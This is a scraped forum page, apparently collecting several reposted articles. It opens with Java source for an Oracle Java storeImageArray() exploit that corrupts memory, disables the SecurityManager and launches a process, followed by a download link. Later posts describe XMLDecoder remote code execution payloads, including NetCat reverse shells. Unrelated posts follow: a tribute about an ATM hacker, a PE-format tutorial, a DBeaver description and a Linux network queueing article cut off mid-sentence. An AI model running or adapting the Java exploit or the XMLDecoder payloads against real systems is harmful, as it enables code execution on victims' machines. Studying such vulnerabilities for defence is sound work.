layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(btnStart) .addContainerGap()) ); }// </editor-fold>//GEN-END:initComponents private boolean _isMac = System.getProperty("os.name","").contains("Mac"); private boolean _is64 = System.getProperty("os.arch","").contains("64"); // we will need ColorSpace which returns 1 from getNumComponents() class MyColorSpace extends ICC_ColorSpace { public MyColorSpace() { super(ICC_Profile.getInstance(ColorSpace.CS_sRGB)); } // override getNumComponents public int getNumComponents() { int res = 1; //logAdd("MyColorSpace.getNumComponents() = " + res); return res; } } // we will need ComponentColorModel with the obedient isCompatibleRaster() which always returns true. class MyColorModel extends ComponentColorModel { public MyColorModel() { super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE); } // override isCompatibleRaster public boolean isCompatibleRaster(Raster r) { boolean res = true; logAdd("MyColorModel.isCompatibleRaster() = " + res); return res; } } private int tryExpl() { try { // alloc aux vars String name = "setSecurityManager"; Object[] o1 = new Object[1]; Object o2 = new Statement(System.class, name, o1); // make a dummy call for init // allocate byte buffer for destination Raster. DataBufferByte dst = new DataBufferByte(16); // allocate the target array right after dst int[] a = new int[8]; // allocate an object array right after a[] Object[] oo = new Object[7]; // create Statement with the restricted AccessControlContext oo[2] = new Statement(System.class, name, o1); // create powerful AccessControlContext Permissions ps = new Permissions(); ps.add(new AllPermission()); oo[3] = new AccessControlContext( new ProtectionDomain[]{ new ProtectionDomain( new CodeSource( new java.net.URL("file:///"), new java.security.cert.Certificate[0] ), ps ) } ); // store System.class pointer in oo[] oo[4] = ((Statement)oo[2]).getTarget(); // save old a.length int oldLen = a.length; logAdd("a.length = 0x" + toHex(oldLen)); // create regular source image BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB); logAdd(bi1); // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 8:0)); // create malformed destination image based on dst[] data WritableRaster wr = Raster.createWritableRaster(sm, dst, null); BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null); logAdd(bi2); // prepare first pixel which will overwrite a.length bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1}); // call the vulnerable storeImageArray() function (see ...\jdk\src\share\native\sun\awt\medialib\awt_ImagingLib.c) AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null); op.filter(bi1, bi2); // check results: a.length should be overwritten by 0xFFFFFFFF int len = a.length; logAdd("a.length = 0x" + toHex(len)); if (len == oldLen) { // check a[] content corruption // for RnD for(int i=0; i < len; i++) if (a != 0) logAdd("a["+i+"] = 0x" + toHex(a)); // exit logAdd("error 1"); return 1; } // ok, now we can read/write outside the real a[] storage, // lets find our Statement object and replace its private "acc" field value // search for oo[] after a[oldLen] boolean found = false; int ooLen = oo.length; for(int i=oldLen+2; i < oldLen+32; i++) if (a[i-1]==ooLen && a==0 && a[i+1]==0 // oo[0]==null && oo[1]==null && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null { // read pointer from oo[4] int stmTrg = a[i+4]; // search for the Statement.target field behind oo[] for(int j=i+7; j < i+7+64; j++){ if (a[j] == stmTrg) { // overwrite default Statement.acc by oo[3] ("AllPermission") a[j-1] = a[i+3]; found = true; break; } } if (found) break; } // check results if (!found) { // print the memory dump on error // for RnD String s = "a["+oldLen+"...] = "; for(int i=oldLen; i < oldLen+32; i++) s += toHex(a) + ","; logAdd(s); } else try { // show current SecurityManager logAdd(System.getSecurityManager(), "Security Manager = "); // call System.setSecurityManager(null) ((Statement)oo[2]).execute(); // show results: SecurityManager should be null logAdd(System.getSecurityManager(), "Security Manager = "); } catch (Exception ex) { logError(ex); } logAdd(System.getSecurityManager() == null ? "Ok.":"Fail."); } catch (Exception ex) { logError(ex); } return 0; } private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed try { logAdd("===== Start ====="); // try several attempts to exploit for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ logAdd("Attempt #" + i); tryExpl(); } // check results if (System.getSecurityManager() == null) { // execute payload Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); } logAdd("===== End ====="); } catch (Exception ex) { logError(ex); } }//GEN-LAST:event_btnStartMousePressed // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton btnStart; private javax.swing.JScrollPane jScrollPane2; private javax.swing.JTextArea txtArea; // End of variables declaration//GEN-END:variables } Download: http://packetstormsecurity.com/files/download/122777/PSA-2013-0811-1-exploit.tgz Sursa: Oracle Java storeImageArray() Invalid Array Indexing Code Execution ? Packet Storm
  14. No, si cati teroristi si infractori au prins asa pisatii?
  15. ATM manufacturer pays respects to hacker who broke into its systems Both Barnaby Jack and Triton showed how white-hat hacking should be done. A tribute to the late Barnaby Jack by the company whose systems he hacked shows how hackers can really help make the world a safer place. When New Zealand hacker Barnaby Jack suddendly died last month, the Internet was awash with tributes to the man probably best known for the "jackpotting" attack on ATMs he demonstrated at the Black Hat conference in 2010. The tributes demonstrated that Jack, who was due to speak at Black Hat this year on hacking pacemakers, was both loved an respected in the security community. His sister wrote the touching words "I was always so proud. Seems I'm not the only one." Yesterday, I spotted another tribute, by Henry Schwarz of Triton. Triton produces ATMs - the very machines whose security Jack demonstrated wasn't up to date. Many in Triton's position would have ignored or denied the problem, and perhaps even attempted to prevent Jack from speaking about the hack (as happened recently to researchers who had broken security codes in expensive cars). Instead, Triton did what was the only right thing to do: the company reached out to Jack and worked with him on improving the security of its systems. Jack, too, could have made the wrong decision: it doesn't require much imagination to understand how his ATM-hacking skills could easily have made him a lot of money. But he informed the ATM vendors about the attack, worked with them to solve the issues, and delayed a presentation about it until after a patch had been rolled out. He even decided not to disclose the how-to of the attack. It isn't always easy to explain to the general public how white-hat hackers, when they go on stage and demonstrate what to most people looks like a clear criminal act, really help make the world a safer place. Perhaps we should tell them the story of Barnaby Jack and Triton. Schwarz finishes his tribute by writing "Barnaby and I started as adversaries and ended as friends. Our heartfelt condolences to his family and loved ones." We, of course, share that sentiment. Sursa: Virus Bulletin : Blog - ATM manufacturer pays respects to hacker who broke into its systems
  16. [h=3]Using XMLDecoder to execute server-side Java Code on an Restlet application (i.e. Remote Command Execution)[/h] At the DefCon REST Presentation we did last week (see slides here), after the Neo4J CSRF payload to start processes (calc and nc) on the server demo, we also showed how dangerous the Java’s XmlDecoder can be. (tldr: scroll to the end of the article to see how to create an XML file that will trigger an reverse-shell from an REST server into an attacker's box) I have to say that I was quite surprised that it was possible to execute Java code (and start processes) from XML files! Abraham and Alvaro deserve all the credit for connecting the dots between XMLDecoder and REST. Basically what happens is that the Java’s JDK has a feature called Long Term Persistence which can be used like this: As you can see by the example shown above, the Xml provided to XMLDecoder API is able to create an instance of javax.swing.JButton and invoke its methods. I can see why this is useful and why it was added to the JDK (since it allows for much better ‘Long Term Object Persistence’), BUT, in practice, what this means is that java payloads can be inserted in XML files/messages. This is already dangerous in most situations (i.e. when was the last time that you actually thought that an XML file was able to trigger code execution on a server), BUT when you add REST to the mix, we basically have a ‘Remote Code/Command Execution’ vulnerability. Awareness for this issue Although there is some awareness out there of the dangers of XMLDecode, I don’t think there is enough understanding of what is possible to do with the XML provided to the XMLDecoder . For example Is it safe to use XMLDecoder to read document files? asks: ... with the answer being spot on: Unfortunately, one really has to look for those ‘alerts’, since the main XMLDecoder info/documentation doesn’t mention them. For example the main links you get by searching for XMLDecoder: ... encourage its use: ...and provide no info on the ‘remote code execution’ feature of XMLDecoder. Connecting the Dots: Using XmlDecoder on an REST API There are two key scenarios where this ‘feature’ becomes a spectacular vulnerability: Server-side backend system that process attacker-controlled XML files using XMLDecoder REST APIs that uses XMLDecoder to create strongly type objects from the HTTP Request data And the 2nd case is is exactly what happens with Restlet REST API , which wraps XMLDecode in its org.restlet.representation.ObjectRepresentation<T> feature/class. Note how the documentation page: ... makes no reference to the dangerous use of XMLDecoder (ironically, it doesn’t even mention XMLDecoder, just that it can parse data created by XMLEncoder) How XMLDecoder is used in Restlet In Restlet the ObjectRepresentation<T> class can be used on REST methods to create objects from the HTTP request body (which is an XML string) . For example, on the PoC that we created for the DefCon presentation (based on one of RestLet source code example apps) ... I changed the code at Line 68 (which manually retrieved data from the HTTP Request data) ... into the code you can see below at line 72 ... which uses ObjectRepresentation<T> to map the HTTP Request data into an object of type Item: Note that this is exactly the capability that are provided by MVC Frameworks that automagically bind HTTP post data into Model objects. This 'feature' is the one that creates the the Model Binding Vulnerabilities which I have been talking about here, here, here, here, here, here, here and here. In fact, the XMLDecoder is is a ModelBinding Vulnerability (also called Over Posting, Mass Assignment or Auto Binding vulns) on steroids, since not only we can put data on that object, we can create completely new ones and invoke methods in them. Before you read the exploits, remember that the change I made to the code (see below) … is one that any developer could do if tasked with automatically casting the received REST XML data into Objects. In order to develop the exploits and create PoCs, I quickly wrote an O2 Platform based tool, which you can get from here: This tool: … provided a gui where these XML exploits: …could be easy sent to a running instance of the test RestLet app. Multiple examples of what can be done using the XMLDecode meta-language 1 - create item (Simple).xml - normal object creation 2 - create item (using properties).xml - object creation and calling setters 3 - create item (from var).xml - creating and using an variable 4 - create item (and more).xml - creating/invoking a complete different class 5 - create item (and calc).xml - starting cacl.exe using Java's Runtime.getRuntime() . Note that this example is VERY STEALTH since there will be no casting error thrown by the XMLDecoder conversion (the first object created in the XML execution is the one returned, which in this case is the expected one (firstResource.Item)) 6 - Process Builder - Start a Calc.xml - Create a complete different object (ProcessBuilder) which will throw an casting error ... after the process execution starts 7a - Creating a File.xml - in the target app we were using there was no webroot available with ability to render JSPs (it was a pure REST server with only REST routes). But if it there was one, and we could write to it, we could use the technique shown below to upload an JSPShell (like this one), and exploit the server from there. 7b - Creating a Class File.xml - since we can upload files, we can compile a class file locally and 'upload' it to the server 7d - execution class file - anotherExecute- calcl.xml - in this case the class file we uploaded had a method that could be used to start processes 8a - HttpResponse - return variable.xml - this is a cool technique where I found the Restlet equivalent of HttpServletresponse, so I was able to write content directly to the current browser 8b - HttpResponse - return variables.xml - which can be used to return data assigned to XMLDecoder created variables 8c - HttpResponse - return JavaProperties.xml - In this case the java.lang.getProperties values (but if this was a real app, we could use this to extract data from the database or in memory objects) 8d - Exploit - Create XSS.xml - another option is to trigger XSS on the current user (usefully if the first payload was delivered over CSRF to the victim) 8e - HttpResponse - execute process - read two lines.xml - here is a way to execute a process and get its output shown in the browser 9a - download NetCat.xml - here is how to trigger a http connection from the server into the attacker's box and download the NetCat tool 9b - Start NetCat reverse shell.xml - once NetCat is available on the server, we can use it to send a reverse-shell an external IP:Port This is when I run out of time for writing more PoCs.... ... but as you can see by the end, I was just about writing Java code, only thing I didn’t figure out how to do create loops and anonymous methods/classes (need to look at the Command Pattern). I also hope that by now you see how dangerous the XMLDecoder capabilities are, and how its use must be VERY VERY carefully analysed and protected. How to use XMLDecoder be safely? I’m not entirely sure at the moment. The Secure Coding Guidelines for the Java Programming Language, Version 4.0 have a note on 'Long Term Persistence of JavaBeans': But the Long Term Persistence of JavaBeans Components: XML Schema article (which btw is the best resource out there on how to use the XmlDecoder), has no mention of Security. Hopefully the presentation that we did at DefCon and blog posts like this, will raise the awareness of this issue and good solutions will emerge Note that I’m not as good in Java as I am in .NET, so I’m sure there is something in Java or JDK that I’m missing. Let me know what you think of this issue, if there are safe ways to use XmlDecoder and if you spot other dangerous uses of XmlDecoder. UPDATE: Presentation slides See this page for the presentation slides (hosted by SlideShare) Dinis Cruz at 13:33 Sursa: Dinis Cruz Blog: Using XMLDecoder to execute server-side Java Code on an Restlet application (i.e. Remote Command Execution)
  17. @Byte-ul Trebuia sa dau licenta in aceasta vara, insa nu am luat toate examenele, deci mai am de asteptat. Nu pot spune in ce consta, doar pot spune ca are legatura cu fisierele PE. Cand va fi gata, probabil in iarna, daca nu imi voi schimba tema, o voi posta aici cu toate informatiile necesare. @bobi_m6 Mersi de sfaturi, voi tine cont de ele cand voi redacta versiunea finala a teoriei pentru licenta. Practic nu arata chiar asa la inceput, nu era atat de "personala", dar am transformat-o practic in tutorial pentru a intelege mai bine toata lumea. @Matt Aceasta este versiunea finala. Nu este un articol complet despre ceea ce inseamna "structura PE", dar sper ca pe viitor sa scriu si o a doua parte in care sa aduc completarile necesare.
  18. [RST] Tutorial - Formatul fisierelor PE Acest tutorial e practic o parte din "teoria" pentru lucrarea mea de licenta. Articolul nu este complet, se adreseaza incepatorilor si sper ca toata lumea va intelege despre ce e vorba. V-ati intrebat vreodata ce contine un fisier executabil (.exe) sau o biblioteca de functii (.dll)? Aici veti gasi cateva notiuni de baza. Continut: - Format general - Headerul MS-DOS - Programul MS-DOS - Headerele PE - Tabelul de sectiuni Daca aveti intrebari, nu ezitati sa le postati. Download: https://rstforums.com/proiecte/Formatul_Fisierelor_PE.pdf http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf Thanks
  19. Probabil a fost fortat de catre "baietii veseli"... Incet, incet pierdem controlul asupra a ceea ce in trecut era "lumea noastra".
  20. DBeaver - Universal Database Manager Overview DBeaver is free and open source (GPL) universal database tool for developers and database administrators. Usability is the main goal of this project, program UI is carefully designed and implemented. It is freeware. It is multiplatform. It is based on opensource framework and allows writing of various extensions (plugins). It supports any database having a JDBC driver. It may handle any external datasource which may or may not have a JDBC driver. There is a set of plugins for certain databases (MySQL and Oracle in version 1.x) and different database management utilities (e.g. ERD). Supported (tested) databases: MySQL Oracle PostgreSQL IBM DB2 Microsoft SQL Server Sybase ODBC Java DB (Derby) Firebird (Interbase) HSQLDB SQLite Mimer H2 IBM Informix SAP MAX DB Cache Ingres Linter Teradata Vertica Any JDBC compliant data source Supported OSes: Windows (2000/XP/2003/Vista/7) Linux Mac OS Solaris AIX HPUX General features: Database metadata browse Metadata editor (tables, columns, keys, indexes) SQL statements/scripts execution SQL highlighting (specific for each database engine) Autocompletion and metadata hyperlinks in SQL editor Result set/table edit BLOB/CLOB support (view and edit modes) Scrollable resultsets Data (tables, query results) export Transactions management Database objects (tables, columns, constraints, procedures) search ER diagrams Database object bookmarks SQL scripts management Projects (connections, SQL scripts and bookmarks) MySQL plugin features: Enum/Set datatypes Procedures/triggers view Metadata DDL view Session management Users management Catalogs management Advanced metadata editor Oracle plugin features: XML, Cursor datatypes support Packages, procedures, triggers, indexes, tablespaces and other metadata objects browse/edit Metadata DDL view Session management Users management Advanced metadata editor Other Benefits: DBeaver consumes much less memory than other popular similar software (SQuirreL, DBVisualizer) Database metadata is loaded on demand and there is no long-running “metadata caching” procedure at connect time ResultSet viewer (grid) is very fast and consumes very little ammount of memory All remote database operations work in non-blocking mode so DBeaver does not hang if the database server does not respond or if there is a related network issue License DBeaver is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. DBeaver is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. License full version Contacts Technical support – support@jkiss.org Technical support, feature suggestions and any other questions – serge@jkiss.org Download: http://dbeaver.jkiss.org/download/ Sursa: DBeaver - Universal Database Manager
  21. Queueing in the Linux Network Stack [A slightly shorter and edited version of this article appeared in the July 2013 issue of Linux Journal. Thanks to Linux Journal's great copyright policy I'm still allowed to post this on my site. Go here to subscribe to Linux Journal.] Packet queues are a core component of any network stack or device. They allow for asynchronous modules to communicate, increase performance and have the side affect of impacting latency. This article aims to explain where IP packets are queued in the Linux network stack, how interesting new latency reducing features such as BQL operate and how to control buffering for reduced latency. The figure below will be referenced throughout and modified versions presented to illustrate specific concepts. Figure 1 – Simplified high level overview of the queues on the transmit path of the Linux network stack Driver Queue (aka ring buffer) Between the IP stack and the network interface controller (NIC) lies the driver queue. This queue is typically implemented as a first-in, first-out (FIFO) ring buffer – just think of it as a fixed sized buffer. The driver queue does not contain packet data. Instead it consists of descriptors which point to other data structures called socket kernel buffers (SKBs) which hold the packet data and are used throughout the kernel. Figure 2 – Partially full driver queue with descriptors pointing to SKBs The input source for the driver queue is the IP stack which queues complete IP packets. The packets may be generated locally or received on one NIC to be routed out another when the device is functioning as an IP router. Packets added to the driver queue by the IP stack are dequeued by the hardware driver and sent across a data bus to the NIC hardware for transmission. The reason the driver queue exists is to ensure that whenever the system has data to transmit, the data is available to the NIC for immediate transmission. That is, the driver queue gives the IP stack a location to queue data asynchronously from the operation of the hardware. One alternative design would be for the NIC to ask the IP stack for data whenever the physical medium is ready to transmit. Since responding to this request cannot be instantaneous this design wastes valuable transmission opportunities resulting in lower throughput. The opposite approach would be for the IP stack to wait after a packet is created until the hardware is ready to transmit. This is also not ideal because the IP stack cannot move on to other work. Huge Packets from the Stack Most NICs have a fixed maximum transmission unit (MTU) which is the biggest frame which can be transmitted by the physical media. For Ethernet the default MTU is 1,500 bytes but some Ethernet networks support Jumbo Frames of up to 9,000 bytes. Inside IP network stack, the MTU can manifest as a limit on the size of the packets which are sent to the device for transmission. For example, if an application writes 2,000 bytes to a TCP socket then the IP stack needs to create two IP packets to keep the packet size less than or equal to a 1,500 MTU. For large data transfers the comparably small MTU causes a large number of small packets to be created and transferred through the driver queue. In order to avoid the overhead associated with a large number of packets on the transmit path, the Linux kernel implements several optimizations: TCP segmentation offload (TSO), UDP fragmentation offload (UFO) and generic segmentation offload (GSO). All of these optimizations allow the IP stack to create packets which are larger than the MTU of the outgoing NIC. For IPv4, packets as large as the IPv4 maximum of 65,536 bytes can be created and queued to the driver queue. In the case of TSO and UFO, the NIC hardware takes responsibility for breaking the single large packet into packets small enough to be transmitted on the physical interface. For NICs without hardware support, GSO performs the same operation in software immediately before queueing to the driver queue. Recall from earlier that the driver queue contains a fixed number of descriptors which each point to packets of varying sizes, Since TSO, UFO and GSO allow for much larger packets these optimizations have the side effect of greatly increasing the number of bytes which can be queued in the driver queue. Figure 3 illustrates this concept in contrast with figure 2. Figure 3 – Large packets can be sent to the NIC when TSO, UFO or GSO are enabled. This can greatly increase the number of bytes in the driver queue. While the rest of this article focuses on the transmit path it is worth noting that Linux also has receive side optimizations which operate similarly to TSO, UFO and GSO. These optimizations also have the goal of reducing per-packet overhead. Specifically, generic receive offload (GRO) allows the NIC driver to combine received packets into a single large packet which is then passed to the IP stack. When forwarding packets, GRO allows for the original packets to be reconstructed which is necessary to maintain the end-to-end nature of IP packets. However, there is one side affect, when the large packet is broken up on the transmit side of the forwarding operation it results in several packets for the flow being queued at once. This ‘micro-burst’ of packets can negatively impact inter-flow latencies. Starvation and Latency Despite its necessity and benefits, the queue between the IP stack and the hardware introduces two problems: starvation and latency. If the NIC driver wakes to pull packets off of the queue for transmission and the queue is empty the hardware will miss a transmission opportunity thereby reducing the throughput of the system. This is referred to as starvation. Note that an empty queue when the system does not have anything to transmit is not starvation – this is normal. The complication associated with avoiding starvation is that the IP stack which is filling the queue and the hardware driver draining the queue run asynchronously. Worse, the duration between fill or drain events varies with the load on the system and external conditions such as the network interface’s physical medium. For example, on a busy system the IP stack will get fewer opportunities to add packets to the buffer which increases the chances that the hardware will drain the buffer before more packets are queued. For this reason it is advantageous to have a very large buffer to reduce the probability of starvation and ensures high throughput. While a large queue is necessary for a busy system to maintain high throughput, it has the downside of allowing for the introduction of a large amount of latency. Figure 4 – Interactive packet (yellow) behind bulk flow packets (blue) Figure 4 shows a driver queue which is almost full with TCP segments for a single high bandwidth, bulk traffic flow (blue). Queued last is a packet from a VoIP or gaming flow (yellow). Interactive applications like VoIP or gaming typically emit small packets at fixed intervals which are latency sensitive while a high bandwidth data transfer generates a higher packet rate and larger packets. This higher packet rate can fill the buffer between interactive packets causing the transmission of the interactive packet to be delayed. To further illustrate this behaviour consider a scenario based on the following assumptions: A network interface which is capable of transmitting at 5 Mbit/sec or 5,000,000 bits/sec. Each packet from the bulk flow is 1,500 bytes or 12,000 bits. Each packet from the interactive flow is 500 bytes. The depth of the queue is 128 descriptors There are 127 bulk data packets and 1 interactive packet queued last. Given the above assumptions, the time required to drain the 127 bulk packets and create a transmission opportunity for the interactive packet is (127 * 12,000) / 5,000,000 = 0.304 seconds (304 milliseconds for those who think of latency in terms of ping results). This amount of latency is well beyond what is acceptable for interactive applications and this does not even represent the complete round trip time – it is only the time required transmit the packets queued before the interactive one. As described earlier, the size of the packets in the driver queue can be larger than 1,500 bytes if TSO, UFO or GSO are enabled. This makes the latency problem correspondingly worse. Large latencies introduced by oversized, unmanaged buffers is known as Bufferbloat. For a more detailed explanation of this phenomenon see Controlling Queue Delay and the Bufferbloat project. As the above discussion illustrates, choosing the correct size for the driver queue is a Goldilocks problem – it can’t be too small or throughput suffers, it can’t be too big or latency suffers. Byte Queue Limits (BQL) Byte Queue Limits (BQL) is a new feature in recent Linux kernels (> 3.3.0) which attempts to solve the problem of driver queue sizing automatically. This is accomplished by adding a layer which enables and disables queuing to the driver queue based on calculating the minimum buffer size required to avoid starvation under the current system conditions. Recall from earlier that the smaller the amount of queued data, the lower the maximum latency experienced by queued packets. It is key to understand that the actual size of the driver queue is not changed by BQL. Rather BQL calculates a limit of how much data (in bytes) can be queued at the current time. Any bytes over this limit must be held or dropped by the layers above the driver queue. The BQL mechanism operates when two events occur: when packets are enqueued to the driver queue and when a transmission to the wire has completed. A simplified version of the BQL algorithm is outlined below. LIMIT refers to the value calculated by BQL. **** ** After adding packets to the queue **** if the number of queued bytes is over the current LIMIT value then disable the queueing of more data to the driver queue Notice that the amount of queued data can exceed LIMIT because data is queued before the LIMIT check occurs. Since a large number of bytes can be queued in a single operation when TSO, UFO or GSO are enabled these throughput optimizations have the side effect of allowing a higher than desirable amount of data to be queued. If you care about latency you probably want to disable these features. See later parts of this article for how to accomplish this. The second stage of BQL is executed after the hardware has completed a transmission (simplified pseudo-code): **** ** When the hardware has completed sending a batch of packets ** (Referred to as the end of an interval) **** if the hardware was starved in the interval increase LIMIT else if the hardware was busy during the entire interval (not starved) and there are bytes to transmit decrease LIMIT by the number of bytes not transmitted in the interval if the number of queued bytes is less than LIMIT enable the queueing of more data to the buffer As you can see, BQL is based on testing whether the device was starved. If it was starved, then LIMIT is increased allowing more data to be queued which reduces the chance of starvation. If the device was busy for the entire interval and there are still bytes to be transferred in the queue then the queue is bigger than is necessary for the system under the current conditions and LIMIT is decreased to constrain the latency. A real world example may help provide a sense of how much BQL affects the amount of data which can be queued. On one of my servers the driver queue size defaults to 256 descriptors. Since the Ethernet MTU is 1,500 bytes this means up to 256 * 1,500 = 384,000 bytes can be queued to the driver queue (TSO, GSO etc are disabled or this would be much higher). However, the limit value calculated by BQL is 3,012 bytes. As you can see, BQL greatly constrains the amount of data which can be queued. An interesting aspect of BQL can be inferred from the first word in the name – byte. Unlike the size of the driver queue and most other packet queues, BQL operates on bytes. This is because the number of bytes has a more direct relationship with the time required to transmit to the physical medium than the number of packets or descriptors since the later are variably sized. BQL reduces network latency by limiting the amount of queued data to the minimum required to avoid starvation. It also has the very important side effect of moving the point where most packets are queued from the driver queue which is a simple FIFO to the queueing discipline (QDisc) layer which is capable of implementing much more complicated queueing strategies. The next section introduces the Linux QDisc layer. Queuing Disciplines (QDisc) The driver queue is a simple first in, first out (FIFO) queue. It treats all packets equally and has no capabilities for distinguishing between packets of different flows. This design keeps the NIC driver software simple and fast. Note that more advanced Ethernet and most wireless NICs support multiple independent transmission queues but similarly each of these queues is typically a FIFO. A higher layer is responsible for choosing which transmission queue to use. Sandwiched between the IP stack and the driver queue is the queueing discipline (QDisc) layer (see Figure 1). This layer implements the traffic management capabilities of the Linux kernel which include traffic classification, prioritization and rate shaping. The QDisc layer is configured through the somewhat opaque tc command. There are three key concepts to understand in the QDisc layer: QDiscs, classes and filters. The QDisc is the Linux abstraction for traffic queues which are more complex than the standard FIFO queue. This interface allows the QDisc to carry out complex queue management behaviours without requiring the IP stack or the NIC driver to be modified. By default every network interface is assigned a pfifo_fast QDisc which implements a simple three band prioritization scheme based on the TOS bits. Despite being the default, the pfifo_fast QDisc is far from the best choice because it defaults to having very deep queues (see txqueuelen below) and is not flow aware. The second concept which is closely related to the QDisc is the class. Individual QDiscs may implement classes in order to handle subsets of the traffic differently. For example, the Hierarchical Token Bucket (HTB) QDisc allows the user to configure 500Kbps and 300Kbps classes and direct traffic to each as desired. Not all QDiscs have support for multiple classes – those that do are referred to as classful QDiscs. Filters (also called classifiers) are the mechanism used to classify traffic to a particular QDisc or class. There are many different types of filters of varying complexity. u32 being the most general and the flow filter perhaps the easiest to use. The documentation for the flow filter is lacking but you can find an example in one of my QoS scripts. For more detail on QDiscs, classes and filters see the LARTC HOWTO and the tc man pages. Buffering between the transport layer and the queueing disciplines In looking at the previous figures you may have noticed that there are no packet queues above the queueing discipline layer. What this means is that the network stack places packets directly into the queueing discipline or else pushes back on the upper layers (eg socket buffer) if the queue is full. The obvious question that follows is what happens when the stack has a lot of data to send? This could occur as the result of a TCP connection with large congestion window or even worse an application sending UDP packets as fast as it can. The answer is that for a QDisc with a single queue, the same problem outlined in Figure 4 for the driver queue occurs. That is, a single high bandwidth or high packet rate flow can consume all of the space in the queue causing packet loss and adding significant latency to other flows. Even worse this creates another point of buffering where a standing queue can form which increases latency and causes problems for TCP’s RTT and congestion window size calculations. Since Linux defaults to the pfifo_fast QDisc which effectively has a single queue (because most traffic is marked with TOS=0) this phenomenon is not uncommon. As of Linux 3.6.0 (2012-09-30), the Linux kernel has a new feature called TCP Small Queues which aims to solve this problem for TCP. TCP Small Queues adds a per TCP flow limit on the number of bytes which can be queued in the QDisc and driver queue at any one time. This has the interesting side effect of causing the kernel to push back on the application earlier which allows the application to more effectively prioritize writes to the socket. At present (2012-12-28) it is still possible for single flows from other transport protocols to flood the QDisc layer. Another partial solution to transport layer flood problem which is transport layer agnostic is to use a QDisc which has many queues, ideally one per network flow. Both the Stochastic Fairness Queueing (SFQ) and Fair Queueing with Controlled Delay (fq_codel) QDiscs fit this problem nicely as they effectively have a queue per network flow. How to manipulate the queue sizes in Linux Driver Queue The ethtool command is used to control the driver queue size for Ethernet devices. ethtool also provides low level interface statistics as well as the ability to enable and disable IP stack and driver features. The -g flag to ethtool displays the driver queue (ring) parameters: [root@alpha net-next]# ethtool -g eth0 Ring parameters for eth0: Pre-set maximums: RX: 16384 RX Mini: 0 RX Jumbo: 0 TX: 16384 Current hardware settings: RX: 512 RX Mini: 0 RX Jumbo: 0 TX: 256 You can see from the above output that the driver for this NIC defaults to 256 descriptors in the transmission queue. Early in the Bufferbloat investigation it was often recommended to reduce the size of the driver queue in order to reduce latency. With the introduction of BQL (assuming your NIC driver supports it) there is no longer any reason to modify the driver queue size (see the below for how to configure BQL). Ethtool also allows you to manage optimization features such as TSO, UFO and GSO. The -k flag displays the current offload settings and -K modifies them. [dan@alpha ~]$ ethtool -k eth0 Offload parameters for eth0: rx-checksumming: off tx-checksumming: off scatter-gather: off tcp-segmentation-offload: off udp-fragmentation-offload: off generic-segmentation-offload: off generic-receive-offload: on large-receive-offload: off rx-vlan-offload: off tx-vlan-offload: off ntuple-filters: off receive-hashing: off Since TSO, GSO, UFO and GRO greatly increase the number of bytes which can be queued in the driver queue you should disable these optimizations if you want to optimize for latency over throughput. It’s doubtful you will notice any CPU impact or throughput decrease when disabling these features unless the system is handling very high data rates. Byte Queue Limits (BQL) The BQL algorithm is self tuning so you probably don’t need to mess with this too much. However, if you are concerned about optimal latencies at low bitrates then you may want override the upper limit on the calculated LIMIT value. BQL state and configuration can be found in a /sys directory based on the location and name of the NIC. On my server the directory for eth0 is: /sys/devices/pci0000:00/0000:00:14.0/net/eth0/queues/tx-0/byte_queue_limits The files in this directory are: hold_time: Time between modifying LIMIT in milliseconds. inflight: The number of queued but not yet transmitted bytes. limit: The LIMIT value calculated by BQL. 0 if BQL is not supported in the NIC driver. limit_max: A configurable maximum value for LIMIT. Set this value lower to optimize for latency. limit_min: A configurable minimum value for LIMIT. Set this value higher to optimize for throughput. To place a hard upper limit on the number of bytes which can be queued write the new value to the limit_max fie. echo "3000" > limit_max What is txqueuelen? Often in early Bufferbloat discussions the idea of statically reducing the NIC transmission queue was mentioned. The current size of the transmission queue can be obtained from the ip and ifconfig commands. Confusingly, these commands name the transmission queue length differently (bold text): [dan@alpha ~]$ ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:18:F3:51:44:10 inet addr:69.41.199.58 Bcast:69.41.199.63 Mask:255.255.255.248 inet6 addr: fe80::218:f3ff:fe51:4410/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:435033 errors:0 dropped:0 overruns:0 frame:0 TX packets:429919 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:65651219 (62.6 MiB) TX bytes:132143593 (126.0 MiB) Interrupt:23 [dan@alpha ~]$ ip link 1: lo: mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:18:f3:51:44:10 brd ff:ff:ff:ff:ff:ff The length of the transmission queue in Linux defaults to 1,000 packets which is a large amount of buffering especially at low bandwidths. The interesting question is what exactly does 